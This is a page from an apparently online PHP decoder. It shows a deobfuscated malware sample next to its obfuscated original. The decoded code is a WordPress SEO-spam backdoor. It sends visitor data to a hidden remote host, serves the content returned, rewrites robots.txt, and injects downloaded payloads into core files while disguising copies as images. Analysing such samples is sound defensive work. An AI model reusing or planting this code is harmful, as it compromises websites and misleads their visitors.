Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $LvOyYbptnPJ='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$LvOyYbptnP..
Decoded Output download
error_reporting(0);
$go_domain = base64_decode('c2VvODE4LTIwLmJlYXV0aWZ1bHN1bnNldC5zaXRl');
$language = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4);
$userrefer = $_SERVER['HTTP_REFERER']?$_SERVER['HTTP_REFERER']:"";
$useragent = $_SERVER['HTTP_USER_AGENT']?$_SERVER['HTTP_USER_AGENT']:"";
$userip = '';
@$timezone_out = date_default_timezone_get();
$userip = $_SERVER['REMOTE_ADDR'];
$ips = explode(",", $userip);
$userip = trim(current($ips));
$http = 'http';
if(is_https()){
$http = 'https';
}else{
$http = 'http';
}
$index_url = "http://$go_domain/666.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&ip=%s";
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
@$action = $_GET['ac']?$_GET['ac']:"";
if($action != "" && $action == "write"){
write("index.php");
exit("write done!");
}
if(preg_match('@writerobots$@i',$uri)){
$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
$contents = base64_decode(get($request));
@chmod("robots.txt", 0755);
file_put_contents("robots.txt", $contents);
header("Content-type: text/plain; charset=utf-8");
echo $contents."
";
echo "robots write done!!
";
exit();
}elseif(preg_match('@pingsitemap.xml$@i',$uri)){
$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
$content = base64_decode(get($request));
$maplist = explode("@@@", $content);
@header("Content-type: text/plain; charset=utf-8");
foreach($maplist as $map){
$sitemap = "https://www.google.com/ping?sitemap=$map";
$contents = get($sitemap);
if(strpos($contents, "Sitemap Notification Received")){
echo "Submitting Google Sitemap ".$map." : OK!
";
}else{
echo "Submitting Google Sitemap ".$map." : ERROR!
";
}
}
exit();
}elseif(preg_match('@(.*?).xml$@i',$uri)){
$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
$content = get($request);
@header("Content-type: text/xml");
$date_str = date("Y-m-d\TH:i:sP",time());
$content = str_replace("{#date_str}", $date_str, $content);
$content = str_replace("okhtmlgetcontent",'',$content);
echo trim($content);
exit();
}elseif(substr($uri, -4) == ".css"){
$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
$content = get($request);
if(strstr($content,'okhtmlgetcontent')){
@header("Content-type: text/css; charset=utf-8");
$content = str_replace("okhtmlgetcontent",'',$content);
echo trim($content);
}
exit();
}else{
$request = sprintf($index_url, urlencode($host), urlencode($uri), urlencode($http), urlencode($userrefer), urlencode($useragent), urlencode($language), urlencode($userip));
$content = get($request);
if(strstr($content,'okhtmlgetcontent')){
@header("Content-type: text/html; charset=utf-8");
$content = str_replace("okhtmlgetcontent",'',$content);
echo trim($content);
exit();
}else if(strstr($content,'getcontent404page')){
@header('HTTP/1.1 404 Not Found');
echo "404 Not Found";
exit();
}else if(strstr($content,'getcontent301page')){
@header('HTTP/1.1 301 Moved Permanently');
$content = str_replace("getcontent301page",'',$content);
header('Location: '.trim($content));
exit();
}else if(strstr($content,'getcontent500page')){
@header('HTTP/1.1 500 Internal Server Error');
$content = str_replace("getcontent500page",'',$content);
echo "500 Internal Server Error";
exit();
}
}
function write($index_name){
$write1 = get(base64_decode("aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei93cml0ZTEudHh0"));
$write2 = get(base64_decode("aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei93cml0ZTIudHh0"));
$ht_content = file_get_contents(".htaccess");
$index_content = file_get_contents($index_name);
$loader_php = "wp-includes/template-loader.php";
$load_php = "wp-includes/load.php";
$font_editor_php = "wp-includes/SimplePie/index.php";
if(is_dir("wp-includes/SimplePie")){
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
$loader_content = file_get_contents($loader_php);
$load_content = file_get_contents($load_php);
@chmod($loader_php, 0755);@chmod($load_php, 0755);
file_put_contents($loader_php, $write1.$loader_content);
file_put_contents($load_php, $load_content.$write2);
@chmod($loader_php, 0644);@chmod($load_php, 0644);
file_put_contents($font_editor_php, $shell_postfs);
}
}
function get($url){
$contents = @file_get_contents($url);
if (!$contents) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$contents = curl_exec($ch);
curl_close($ch);
}
return $contents;
}
function is_https() {
if ( !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
return true;
} elseif ( isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' ) {
return true;
} elseif ( !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
return true;
}
return false;
}
Did this file decode correctly?
Original Code
<?php $LvOyYbptnPJ='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$LvOyYbptnPJ[(105/15)].$LvOyYbptnPJ[(26-1)].$LvOyYbptnPJ[(1*49)].$LvOyYbptnPJ[((10*1)+18)].$LvOyYbptnPJ[(14+22)].$LvOyYbptnPJ[(44+5)].$LvOyYbptnPJ[(44-13)].$LvOyYbptnPJ[(684/18)].$LvOyYbptnPJ[(23+4)].$LvOyYbptnPJ[(72-(33-7))].$LvOyYbptnPJ[(154/22)].$LvOyYbptnPJ[(11+25)].$LvOyYbptnPJ[(65-(62-31))].$LvOyYbptnPJ[(26-6)].$LvOyYbptnPJ[((27*2)-8)];$pHFdNhg9688=$LvOyYbptnPJ[(20-9)].$LvOyYbptnPJ[(2*4)].$LvOyYbptnPJ[(29*1)].$LvOyYbptnPJ[(160/4)];$MYtraky2482=$LvOyYbptnPJ[(8*5)].$LvOyYbptnPJ[((1+0)+2)].$LvOyYbptnPJ[(6+(1*(95/19)))].$LvOyYbptnPJ[(140/5)].$LvOyYbptnPJ[(522/18)].$LvOyYbptnPJ[(7*((7-3)-2))].$LvOyYbptnPJ[(2*14)].$LvOyYbptnPJ[(138/(2+4))].$LvOyYbptnPJ[(1029/(378/18))].$LvOyYbptnPJ[((2*189)/9)].$LvOyYbptnPJ[(12+(0+0))].$LvOyYbptnPJ[(31*1)].$LvOyYbptnPJ[(48/(36/12))].$LvOyYbptnPJ[(735/15)].$LvOyYbptnPJ[(0+7)].$LvOyYbptnPJ[(18+2)].$LvOyYbptnPJ[(18-(10/5))].$LvOyYbptnPJ[(735/15)].$LvOyYbptnPJ[(0+(2-(1*1)))].$LvOyYbptnPJ[(16-(3+(36/(0+18))))].$LvOyYbptnPJ[((167-23)/18)].$LvOyYbptnPJ[(0+(18-9))].$LvOyYbptnPJ[(1*3)].$LvOyYbptnPJ[(11*(1+(0/(78/13))))].$LvOyYbptnPJ[(2*7)].$LvOyYbptnPJ[(29*(0+1))].$LvOyYbptnPJ[(38-(8+9))].$LvOyYbptnPJ[(15*2)].$LvOyYbptnPJ[(45-11)].$LvOyYbptnPJ[(1*46)].$LvOyYbptnPJ[(1*(17+21))].$LvOyYbptnPJ[(78/3)].$LvOyYbptnPJ[(21+(77/11))].$LvOyYbptnPJ[(22+14)].$LvOyYbptnPJ[(343/(91/13))].$LvOyYbptnPJ[(1*1)].$LvOyYbptnPJ[(21-10)].$LvOyYbptnPJ[(22+(12/2))].$LvOyYbptnPJ[(180/20)].$LvOyYbptnPJ[(3+((0+0)*1))].$LvOyYbptnPJ[(686/(126/9))].$LvOyYbptnPJ[(61-(32-8))].$LvOyYbptnPJ[(476/17)].$LvOyYbptnPJ[((4-0)+22)].$LvOyYbptnPJ[(((23-(2*5))/13)-0)].$LvOyYbptnPJ[(7+(84/21))].$LvOyYbptnPJ[(28/2)].$LvOyYbptnPJ[(9-0)].$LvOyYbptnPJ[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>
Function Calls
null | 1 |
gzinflate | 1 |
base64_decode | 1 |
create_function | 1 |
Stats
MD5 | bbe87288431609e5fbe3d46fc22c4cc7 |
Eval Count | 2 |
Decode Time | 150 ms |